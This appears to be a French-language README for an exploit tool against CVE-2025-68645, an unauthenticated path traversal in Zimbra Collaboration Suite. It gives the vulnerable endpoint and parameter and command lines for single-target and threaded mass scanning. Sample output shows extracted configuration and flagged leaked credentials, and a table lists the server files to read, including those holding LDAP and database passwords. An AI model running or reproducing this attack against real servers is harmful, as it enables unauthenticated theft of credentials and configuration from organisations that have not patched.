
Zimbra Path Traversal (CVE-2025-68645) - Non authentifiée vulnérabilité de lecture de fichier dans Zimbra Collaboration Suite
CVE-2025-68645 est une vulnérabilité de traversée de chemin dans Zimbra Collaboration Suite qui permet à des attaquants non authentifiés de lire des fichiers arbitraires du système de fichiers du serveur.
/h/printconversations?javax.servlet.include.servlet_path=
| Impact | Sévérité |
|---|---|
| Lecture de fichier non authentifiée | 🔴 Élevée |
| Divulgation de configuration | 🔴 Élevée |
| Fuite d'identifiants | 🔴 Élevée |
| Cartographie du réseau interne | 🟠 Moyenne |
python CVE-2025-68645.py.py -t https://target.zimbra.com
python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20
python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30
Argument Description Défaut -t, --target URL de la cible unique None -l, --list Fichier contenant la liste des cibles None -o, --output Nom du fichier de sortie results.json --threads Nombre de threads concurrents 10 --timeout Délai d'attente de la requête en secondes 15 -v, --verbose Activer le mode verbeux False --no-verify Désactiver la vérification SSL False --read-all Lire tous les chemins sensibles False
[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml
============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0
| Chemin | Informations exposées |
|---|
/WEB-INF/web.xml | Mappings de servlets, contraintes de sécurité |
/WEB-INF/zcs.web.xml | Configuration spécifique à Zimbra |
/opt/zimbra/conf/localconfig.xml | Identifiants LDAP, mots de passe de base de données |
/opt/zimbra/conf/ldap-config.xml | Configuration du serveur LDAP |
/opt/zimbra/conf/attrs/zimbra-attrs.xml | Attributs système |
/WEB-INF/classes/logging.properties | Configuration de journalisation |